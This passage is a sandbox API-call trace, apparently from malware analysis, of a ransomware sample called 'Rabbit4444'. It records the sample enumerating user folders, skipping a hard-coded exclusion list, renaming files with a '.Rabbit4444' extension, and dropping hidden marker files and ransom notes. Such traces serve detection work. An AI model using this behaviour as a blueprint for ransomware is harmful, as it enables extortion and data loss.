HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0063.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0063.249] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.249] CloseHandle (hObject=0x2a0) returned 1 [0063.249] CloseHandle (hObject=0x278) returned 1 [0063.249] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 108 [0063.249] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0063.250] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5d8e4b9d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5d8e4b9d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5d8e4b9d, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0063.250] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0063.250] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0063.250] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0063.251] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0063.252] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0063.252] lstrlenW (lpString="Rabbit4444") returned 10 [0063.252] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0063.252] lstrlenW (lpString=".dll") returned 4 [0063.252] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0063.252] lstrlenW (lpString=".lnk") returned 4 [0063.252] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0063.252] lstrlenW (lpString=".ini") returned 4 [0063.252] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0063.252] lstrlenW (lpString=".sys") returned 4 [0063.252] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0063.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.252] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.252] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15456291250) returned 1 [0063.252] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0063.252] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0063.252] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0063.252] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x2a0 [0063.253] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0063.255] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0063.255] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0063.255] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0063.255] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0063.255] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0063.255] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0063.255] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.255] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0063.255] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15456591153) returned 1 [0063.255] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0063.255] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0063.255] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.255] CloseHandle (hObject=0x2a0) returned 1 [0063.255] CloseHandle (hObject=0x278) returned 1 [0063.256] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 113 [0063.256] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0063.256] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5d8e4b9d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5d8e4b9d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5d8e4b9d, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0063.256] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.256] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.256] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0063.256] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0063.256] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0063.256] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0063.256] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0063.257] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0063.257] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0063.257] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0063.257] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0063.257] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0063.257] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0063.257] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0063.257] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0063.257] lstrlenW (lpString="Rabbit4444") returned 10 [0063.257] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0063.257] lstrlenW (lpString=".dll") returned 4 [0063.257] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0063.257] lstrlenW (lpString=".lnk") returned 4 [0063.257] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0063.257] lstrlenW (lpString=".ini") returned 4 [0063.257] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0063.257] lstrlenW (lpString=".sys") returned 4 [0063.257] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0063.257] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5d8e4b9d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x5d8e4b9d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x5d8e4b9d, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0063.257] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0063.258] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.258] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.258] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.259] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.259] CloseHandle (hObject=0x278) returned 1 [0063.259] CloseHandle (hObject=0x298) returned 1 [0063.259] GetCurrentThreadId () returned 0xd98 [0063.259] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0063.259] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState" [0063.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123080 | out: hHeap=0xe0000) returned 1 [0063.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0063.259] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState" [0063.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\" [0063.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0063.260] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.261] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.264] FlushFileBuffers (hFile=0x298) returned 1 [0063.265] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.265] CloseHandle (hObject=0x298) returned 1 [0063.266] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState") returned 88 [0063.266] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.266] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba3f2a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef083cde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.266] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.266] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.266] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.266] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.266] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba3f2a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef083cde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.266] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.266] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.266] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.266] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.266] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.266] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef083cde, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef083cde, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef083cde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.266] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.266] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.266] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef083cde, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef083cde, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef083cde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.266] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.266] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.266] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.267] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.267] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.267] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.267] CloseHandle (hObject=0x278) returned 1 [0063.267] CloseHandle (hObject=0x298) returned 1 [0063.267] GetCurrentThreadId () returned 0xd98 [0063.267] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0063.268] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState" [0063.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123d48 | out: hHeap=0xe0000) returned 1 [0063.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0063.268] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState" [0063.268] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\" [0063.268] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0063.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.269] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.271] FlushFileBuffers (hFile=0x298) returned 1 [0063.272] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.272] CloseHandle (hObject=0x298) returned 1 [0063.273] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState") returned 86 [0063.273] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.273] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba3847, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef083cde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0063.274] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.274] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.274] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.274] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.274] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba3847, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef083cde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.274] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.274] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.274] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.274] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.274] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.274] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef083cde, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef083cde, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef083cde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.274] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.274] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.274] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef083cde, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef083cde, 